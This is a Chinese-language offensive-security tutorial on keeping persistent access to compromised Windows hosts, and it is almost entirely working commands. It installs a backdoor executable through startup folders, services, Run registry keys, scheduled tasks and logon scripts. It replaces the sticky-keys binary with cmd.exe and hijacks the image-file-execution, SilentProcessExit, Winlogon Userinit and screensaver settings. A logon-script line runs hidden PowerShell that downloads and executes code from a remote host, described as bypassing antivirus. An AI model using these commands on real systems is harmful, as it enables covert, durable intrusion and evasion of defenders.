内网对抗-权限维持篇&AD域&单机版&自启动五类&映像劫持&粘滞键&屏幕保护&Logon
➢ 权限维持-内网域&单机版-自启动手法
➢ 权限维持-内网域&单机版-粘滞键后门
➢ 权限维持-内网域&单机版-文件映像劫持
➢ 权限维持-内网域&单机版-屏保&登录&脚本
#权限维持-域环境&单机版-自启动手法
基于服务器重启控制或时间(事件)触发后门执行保持权限维持
1、自启动路径加载(Administrator改成自己的电脑名称)
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
2、自启动服务加载(ServiceTest 任务名称)
sc create ServiceTest binPath= C:\xd.exe start= auto
sc delete ServiceTest
3、自启动注册表加载
-当前用户键值(HKCU)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
-服务器键值(HKLM需要管理员权限)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
-添加启动项(backdoor任务名称,容易被杀毒软件拦截)
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\xd.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\xd.exe"
4、计划计时任务
参考前面横向移动课程(任务名称RunXD)
schtasks /create /tn "RunXD" /tr "C:\xd.exe" /sc daily /st 12:50
查看任务
schtasks
5、组策略
新建一个bat文件,这里bat内容为执行后门命令
使用gpedit.msc进入本地组策略,来到用户配置--》Windows设置--》脚本登录,点击浏览选择bat文件
#权限维持-域环境&单机版-粘滞键后门
系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。
利用条件:开放的远程终端连接服务(3389)
粘滞键位置:
c:\windows\system32\sethc.exe
修改权限:takeown /f C:\Windows\System32\sethc.exe
移动备份:move sethc.exe sethc1.exe
替换劫持:copy cmd.exe sethc.exe
#权限维持-域环境&单机版-文件映像劫持
测试:执行notepad成cmd或后门
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
配合GlobalFlag隐藏:执行正常关闭后触发
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1\xd.exe"
#权限维持-域环境&单机版-屏保&登录&脚本
1、WinLogon配合无文件落地上线
切换用户登录或远程终端登录触发:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:\1\xd.exe,"
2、屏幕保护生效后执行后门
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\2\xd.exe" /f
3、Logon Scripts登录脚本后门
Windows用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\2\xd.exe"
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.139.141:80/a'))"
"
4、文件是落地的,实战中采用无文件落地上线,更加隐藏
例子:powershell无文件命令上线